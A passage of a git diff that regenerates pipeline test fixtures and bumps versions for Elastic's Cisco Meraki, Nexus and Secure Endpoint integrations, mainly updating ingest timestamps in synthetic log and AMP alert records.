url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "event": { - "ingested": "2021-09-07T12:47:57.558570900Z" + "ingested": "2021-12-14T14:40:26.865218616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "event": { - "ingested": "2021-09-07T12:47:57.558574800Z" + "ingested": "2021-12-14T14:40:26.865219089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "event": { - "ingested": "2021-09-07T12:47:57.558578400Z" + "ingested": "2021-12-14T14:40:26.865219495Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "event": { - "ingested": "2021-09-07T12:47:57.558582200Z" + "ingested": "2021-12-14T14:40:26.865219902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "event": { - "ingested": "2021-09-07T12:47:57.558586Z" + "ingested": "2021-12-14T14:40:26.865220303Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "event": { - "ingested": "2021-09-07T12:47:57.558589800Z" + "ingested": "2021-12-14T14:40:26.865220705Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "event": { - "ingested": "2021-09-07T12:47:57.558593600Z" + "ingested": "2021-12-14T14:40:26.865221229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "event": { - "ingested": "2021-09-07T12:47:57.558597200Z" + "ingested": "2021-12-14T14:40:26.865221623Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "event": { - "ingested": "2021-09-07T12:47:57.558616500Z" + "ingested": "2021-12-14T14:40:26.865222166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "event": { - "ingested": "2021-09-07T12:47:57.558622500Z" + "ingested": "2021-12-14T14:40:26.865222568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "event": { - "ingested": "2021-09-07T12:47:57.558627Z" + "ingested": "2021-12-14T14:40:26.865222984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "event": { - "ingested": "2021-09-07T12:47:57.558631200Z" + "ingested": "2021-12-14T14:40:26.865223381Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "event": { - "ingested": "2021-09-07T12:47:57.558635100Z" + "ingested": "2021-12-14T14:40:26.865223839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "event": { - "ingested": "2021-09-07T12:47:57.558638800Z" + "ingested": "2021-12-14T14:40:26.865224290Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "event": { - "ingested": "2021-09-07T12:47:57.558650100Z" + "ingested": "2021-12-14T14:40:26.865224695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 protocol=udp pattern: 1 nostrum", "event": { - "ingested": "2021-09-07T12:47:57.558666200Z" + "ingested": "2021-12-14T14:40:26.865225099Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ercitati 1555314049.atem serro flows cancel", "event": { - "ingested": "2021-09-07T12:47:57.558673Z" + "ingested": "2021-12-14T14:40:26.865225514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "event": { - "ingested": "2021-09-07T12:47:57.558678Z" + "ingested": "2021-12-14T14:40:26.865225921Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "event": { - "ingested": "2021-09-07T12:47:57.558682200Z" + "ingested": "2021-12-14T14:40:26.865226509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-09-07T12:47:57.558701600Z" + "ingested": "2021-12-14T14:40:26.865226911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-09-07T12:47:57.558709Z" + "ingested": "2021-12-14T14:40:26.865227318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-09-07T12:47:57.558714400Z" + "ingested": "2021-12-14T14:40:26.865227757Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-09-07T12:47:57.558719Z" + "ingested": "2021-12-14T14:40:26.865228152Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-09-07T12:47:57.558723200Z" + "ingested": "2021-12-14T14:40:26.865228629Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-09-07T12:47:57.558727Z" + "ingested": "2021-12-14T14:40:26.865229081Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-09-07T12:47:57.558731400Z" + "ingested": "2021-12-14T14:40:26.865229473Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-09-07T12:47:57.558735200Z" + "ingested": "2021-12-14T14:40:26.865229917Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-09-07T12:47:57.558738800Z" + "ingested": "2021-12-14T14:40:26.865230318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-09-07T12:47:57.558742700Z" + "ingested": "2021-12-14T14:40:26.865230839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-09-07T12:47:57.558746300Z" + "ingested": "2021-12-14T14:40:26.865231238Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-09-07T12:47:57.558751300Z" + "ingested": "2021-12-14T14:40:26.865231635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-09-07T12:47:57.558755100Z" + "ingested": "2021-12-14T14:40:26.865232037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-09-07T12:47:57.558759Z" + "ingested": "2021-12-14T14:40:26.865232440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-09-07T12:47:57.558762700Z" + "ingested": "2021-12-14T14:40:26.865232855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml index 6eff64762e0..bde26e0acd7 100644 --- a/packages/cisco_meraki/manifest.yml +++ b/packages/cisco_meraki/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_meraki title: Cisco Meraki -version: 0.3.0 +version: 0.3.1 license: basic description: Collect logs from Cisco Meraki with Elastic Agent. type: integration diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index cc7df7c7d80..3651688c472 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json index 238fa7f04b4..7651a53ff87 100644 --- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json +++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json @@ -1,12 +1,12 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2012 Dec 18 14:51:08 Nexus5010-B %AUTHPRIV-3-SYSTEM_MSG: pam_aaa:Authentication failed for user en from 2.2.2.1 - login", "event": { - "ingested": "2021-09-07T13:06:42.303852400Z" + "ingested": "2021-12-14T14:40:31.302635869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml index 2c7e3457cb3..a1266259670 100644 --- a/packages/cisco_nexus/manifest.yml +++ b/packages/cisco_nexus/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_nexus title: Cisco Nexus -version: 0.3.0 +version: 0.3.1 license: basic description: Collect logs from Cisco Nexus with Elastic Agent. type: integration diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index ae08da24345..24461fb4589 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index 38cf5f7a80e..8dacb214120 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222399500Z", + "ingested": "2021-12-14T14:40:34.011380264Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "code": "553648147", "kind": "alert", @@ -104,7 +104,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222408700Z", + "ingested": "2021-12-14T14:40:34.011383133Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -193,7 +193,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222414700Z", + "ingested": "2021-12-14T14:40:34.011383723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", @@ -271,7 +271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222420600Z", + "ingested": "2021-12-14T14:40:34.011384163Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", @@ -343,7 +343,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222426300Z", + "ingested": "2021-12-14T14:40:34.011384645Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "2164260880", "kind": "alert", @@ -444,7 +444,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222431900Z", + "ingested": "2021-12-14T14:40:34.011385085Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d